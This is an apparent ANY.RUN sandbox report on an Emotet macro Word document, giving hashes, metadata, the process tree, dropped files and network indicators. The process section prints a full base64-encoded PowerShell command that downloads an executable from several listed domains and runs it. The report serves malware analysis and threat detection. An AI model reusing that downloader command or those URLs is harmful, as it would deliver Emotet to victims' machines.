analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

RE_82223888015180410_10092019.doc

Full analysis: https://app.any.run/tasks/50f68a72-61f9-4577-ac51-65a16eac789d
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: October 09, 2019, 15:45:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: invoice, Subject: Handmade Wooden Ball, Author: Francisco Moore, Keywords: Handmade Steel Gloves, Comments: Health, Grocery & Sports, Template: Normal.dotm, Last Saved By: Brandt Schmeler, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:18:00 2019, Last Saved Time/Date: Wed Oct 9 13:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5:

CFB022A24FF5F5E53B3CA65AF95CB955

SHA1:

6F54934A6FD7B531DCFE11A9F53A187E1C25E5B0

SHA256:

843FAD6602A50A9CF09F0D44AD8CF1BE1A102EC005D87C9D194B3D166555CF5D

SSDEEP:

3072:xeGRyYpKgdzSrGtKyIwLx3Z7JsbVWhnmApAFx1Gam73aSWuns2w4DYAF9I:xeGRyYpKUzSSnLx3vzOYVHs2f

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 178.exe (PID: 2696)
      • 178.exe (PID: 3964)
      • msptermsizes.exe (PID: 2468)
      • msptermsizes.exe (PID: 3224)

    • Emotet process was detected

      • 178.exe (PID: 2696)

  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2564)

    • Creates files in the user directory

      • powershell.exe (PID: 2564)

    • PowerShell script executed

      • powershell.exe (PID: 2564)

    • Executable content was dropped or overwritten

      • 178.exe (PID: 2696)
      • powershell.exe (PID: 2564)

    • Starts itself from another location

      • 178.exe (PID: 2696)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2908)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2908)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2564)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Abernathy
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 196
Paragraphs: 1
Lines: 1
Company: Donnelly - Legros
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 168
Words: 29
Pages: 1
ModifyDate: 2019:10:09 12:18:00
CreateDate: 2019:10:09 12:18:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Brandt Schmeler
Template: Normal.dotm
Comments: Health, Grocery & Sports
Keywords: Handmade Steel Gloves
Author: Francisco Moore
Subject: Handmade Wooden Ball
Title: invoice
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 178.exe no specs #EMOTET 178.exe msptermsizes.exe no specs msptermsizes.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2908"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\RE_82223888015180410_10092019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2564powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAAwADUAMwAyAGMANAAwADAAPQAnAGIAMAAwADQANAA5ADQAeAA0ADUANgAnADsAJABjADIANQA3ADQAYwAyADQAOAAxADcAIAA9ACAAJwAxADcAOAAnADsAJABiADcAYgA0ADcAeAAzADAAMAA2ADcAMQBjAD0AJwBiADQANwAwADMAOAA0ADUAMQAwADAAJwA7ACQAYwA4ADEANgA4AGMAOAA0ADMAOQA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADIANQA3ADQAYwAyADQAOAAxADcAKwAnAC4AZQB4AGUAJwA7ACQAeAAzADIANwAzADQAOAA2ADIANQAyAD0AJwBjADAAMwAwAGMANwA1ADAAMAB4ADAAMgA5ACcAOwAkAGMANgA5AGMAMAAwADgANAAyADAAYwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AVAA7ACQAYgAwADUAMAA0AGIAYwBjADYAYgBjADAAOAA9ACcAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AUwBXAFMAeQBpAEsATgB6AGYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBoAG8AcABlAGgAZQByAGIAYQBsAC4AYwBvAG0ALwB0AHIAbwBwAGkAYwBhAC8AUABBAGIATABQAFEAQgBTAC8AQABoAHQAdABwAHMAOgAvAC8AZQAtAGMAZQBuAHQAcgBpAGMAaQB0AHkALgBjAG8AbQAvAGMAcwBzAC8AegBjAG4ASQBkAFcAVQBoAGIAZAAvAEAAaAB0AHQAcABzADoALwAvAG4AZQB3AGEAZwBlAHMAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFcARQBIAHEARAB3AGoAdwBTAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdwBlAHMAdABiAHUAcgB5AGQAZQBuAHQAYQBsAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHYAZwAxAGsAXwAxAGQAcgA1AGMAZAAtADkAOQA5AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoACcAQAAnACkAOwAkAHgAMAA3ADgAMAB4ADkANgAyAHgAMAA9ACcAYgAxADAAMwAyADcAMAA0AGMANAA4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABjAGIAYwA3ADEAMwA5AHgAOQA2AGIAIABpAG4AIAAkAGIAMAA1ADAANABiAGMAYwA2AGIAYwAwADgAKQB7AHQAcgB5AHsAJABjADYAOQBjADAAMAA4ADQAMgAwAGMALgAiAGQATwBXAGAATgBMAG8AYABBAGQARgBpAGAATABlACIAKAAkAGMAYgBjADcAMQAzADkAeAA5ADYAYgAsACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAeABjADIAMwAzADgAYwA0ADQANAAwADcAPQAnAGMANQBiADAAMgAwADEANAA3AGIANwAwAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANgA1ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAYgAwADMAMwA5ADcAMQAwADgAMQA3ADAAYwA9ACcAYwA3ADAAMAAwAGIANwA0ADYANAAwACcAOwBiAHIAZQBhAGsAOwAkAGMAMwA2ADAANgA0ADAAMAAyADMAMAA9ACcAeABiAGIAMgAyADIAMAAwADAANAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAMAA2ADAAMAAwAHgAMABjADMAOQAwADMAPQAnAHgANgAxADAANwA4ADAANQAyADIAYgA4ADAAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3964"C:\Users\admin\178.exe" C:\Users\admin\178.exepowershell.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
2696--3a2e7ef0C:\Users\admin\178.exe
178.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
2468"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe178.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
3224--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exemsptermsizes.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Version:
1, 0, 0, 1
Total events
1 726
Read events
1 232
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE7E.tmp.cvr
MD5:
SHA256:
2564powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S1WKQ1R44K0TWUOQKAZJ.temp
MD5:
SHA256:
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DE7CB22.wmfwmf
MD5:9173886EF4ABB6D7140F65C705FC53B6
SHA256:0804D3642B0105C1995A313C269F6A98AA2286782FC188516E277594C086F44D
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3BDF4F4.wmfwmf
MD5:8FF7EFEAB48C9E1CFCD126293343A2B0
SHA256:7C65B0AF36FCA4CB27789959DCFBD07B7830963E094D1C51BCECE0C79843A210
2908WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F172028E5E0075EC3BEE83A33BAE1C83
SHA256:F574B044C3E96BE2B283ABEAC0013AF827B0F97CBD1EFB62F752408D1F1B75C0
2564powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A670ADD3BF0A1901BD12CC7C4CD70086
SHA256:98E5263D6949B8F81010D65760BB299D37BCF272CE0FFDF5668E2D5CC1545986
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\788EB780.wmfwmf
MD5:A9B73755F5E5B5E286D90A499CD67422
SHA256:B7338BDB8E7C59BDAA4BB52ECFB6D14231D12BDCA83A79735388511EEDC7179D
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC87D8BA.wmfwmf
MD5:A234771D2B089C868B6BFCA68FF342DF
SHA256:5FC6C45301C172FA7BB207F1309129B476A20665BF1B990E359F654E47B93097
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6E95E5D.wmfwmf
MD5:68E547DE1484991AD9C38725B17C6100
SHA256:9CFBD40E2726029D4AE4DAA0C30F46EF604CE5B56E1AE195A0F2AB9F7C858C51
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC0106FF.wmfwmf
MD5:3904440B860F48D98CF95199D50E5AC8
SHA256:374FBDA7CB06FF3CD25B7B05EE3B0E008CF81B137D81ABE32A9712D350CE2A29
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2564
powershell.exe
GET
403
146.88.234.116:80
http://stephporn.com/cgi-bin/oSWSyiKNzf/
FR
html
318 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2564
powershell.exe
166.62.103.202:443
newagesl.com
GoDaddy.com, LLC
US
suspicious
2564
powershell.exe
43.255.154.26:443
thehopeherbal.com
GoDaddy.com, LLC
SG
suspicious
2564
powershell.exe
146.88.234.116:80
stephporn.com
PlanetHoster
FR
suspicious
2564
powershell.exe
35.238.93.185:443
e-centricity.com
US
unknown

DNS requests

Domain
IP
Reputation
stephporn.com
  • 146.88.234.116
suspicious
thehopeherbal.com
  • 43.255.154.26
suspicious
e-centricity.com
  • 35.238.93.185
malicious
newagesl.com
  • 166.62.103.202
suspicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
RE_82223888015180410_10092019.doc